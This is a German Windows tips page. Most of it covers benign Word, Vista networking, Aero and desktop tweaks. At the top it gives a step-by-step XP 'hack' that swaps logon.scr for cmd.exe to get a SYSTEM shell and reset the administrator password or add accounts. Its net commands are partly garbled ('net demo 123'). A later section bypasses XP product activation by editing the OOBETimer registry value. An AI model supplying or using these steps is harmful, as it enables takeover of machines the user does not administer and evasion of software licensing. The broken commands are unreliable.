Admin Passwort unter XP ändern (hacken)

– Start > ausführen > cmd
cd\ windows\system32
mkdir logback
copy logon.scr logback\logon.scr
copy cmd.exe logback\cmd.exe
del logon.scr
rename cmd.exe logon.scr

Wir haben nun den Bildschirmschoner (logon.scr) durch cmd.exe ersetzt und
ein Backup der Dateien im Ordner logback erstellt.
Wenn nun der Bildschirmschober startet (Zeit einstellen) erhält man statt diesem
eine cmd-box mit Systemrechten.
Nun kann man hiermit das Passwort des Admins ändern.

net user password

Heisst der Admin zB. demo, dann ändert man sein Passwort in 123 mit folgendem Befehl

net demo 123

Man kann hier auch neue Konten anlegen etc…


Unter bestimmten Voraussetzungen kann man unter XP auch Systemrechte erlangen (mehr Rechte als Administrator).
Wie das geht steht hier beschrieben.

Word 7 – ‘normalen Zeilenumbruch’ einstellen

1. Bei Formatvorlage ganz rechts unten auf den kleinen Pfeil klicken

 

 

2. Standard-Vorlage / Kombinationsfeld die Option ändern auswählen

 

 

 

 

 

 
3.Im Dialog [Formatvorlage ändern] links auf die Schaltfläche Format – Absatz klicken
4. Im Bereich Abstand den Wert nach 10 pt auf 0 und den Zeilenabstand auf einfach setzen

 

 

 

 

 

 

 

 

 

 

 

 
5. Im Dialog [Formatvorlage ändern] die Option [Neue auf dieser Vorlage basierende Dokumente] aktivieren

Windows Activation entfernen (XP)

  • Start AUSFÜHREN > REGEDIT eingeben
  • zu HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents wechseln
  • Den Schlüssel OOBETimer doppelklicken und mit diesem Wert ersetzen FF D5 71 D6 8B 6A 8D 6F D5 33 93 FD
  • Rechtsklick auf WPAEvents und bei Berechtigungen SYSTEM auswählen
  • Rechner neu starten

Langsamer Internetzugriff unter Vista

Ist der Breitband-Internetzugriff unter Vista langsam und kommt es häufiger zu Fehlermeldungen,
kann man testen das Auto-Tuning-Feature ab zu schalten.

Kommandozeile als Admin öffnen und folgenden Befehl eingeben:
netsh interface tcp set global autotuning=disabled

sollte die Surfgeschwindigkeit nicht gesteigert werden kann man den Urzustand mit
netsh interface tcp set global autotuning=normal

wieder herstellen.
Den aktuellen Status sieht man mit
netsh interface tcp show global

Aero Oberfläche unter Windows Vista Home Basic

Die Sparversion von Vista verzichtet leider auf die Aero Oberfläche. Mit folgenden Schritten
kann man diesen Zustand beheben …

Für manche Schritte wird evtl. die Adminbestätigung benötigt.

– In der Suchleiste nach REGEDIT suchen und starten
– den folgenden Key suchen HKEY_CURRENT_USER/Software/Microsoft/Windows/DWM/
– im rechten Bereich rechtsklicken auf ‘Composition’ und den Wert dann in 1 ändern
– danach den Wert bei ‘CompositionPolicy’ in 2 ändern
ColorizationColor = 40004ade und
ColorizationOpaqueBlend = 0

– in der Suchleiste nun nach CMD suchen und als Administrator starten starten
– in der commandozeile nun net stop uxsms eingeben
– in der commandozeile nun net start uxsms eingeben, dann kann regedit und cmd geschlossen werden

Die Aero Oberfläche ist nun freigeschaltet …

Unerwünschte Icons lassen sich nicht vom Desktop entfernen (XP)

Hat man mal ein hartnäckiges Icon auf dem Desktop sitzen das sich nicht einfach in den Papierkorb verschieben lässt, hilft folgender Trick unter XP.

Rechtsklick auf Desktop > Eigenschaften auswählen > Desktop > Desktop anpassen > Desktop jetzt bereinigen

nun landen alle ungenutzten Icons in einem eigenen Ordner auf dem Desktop und können von hieraus gelöscht, wiederhergestellt werden etc …

Scroll to Top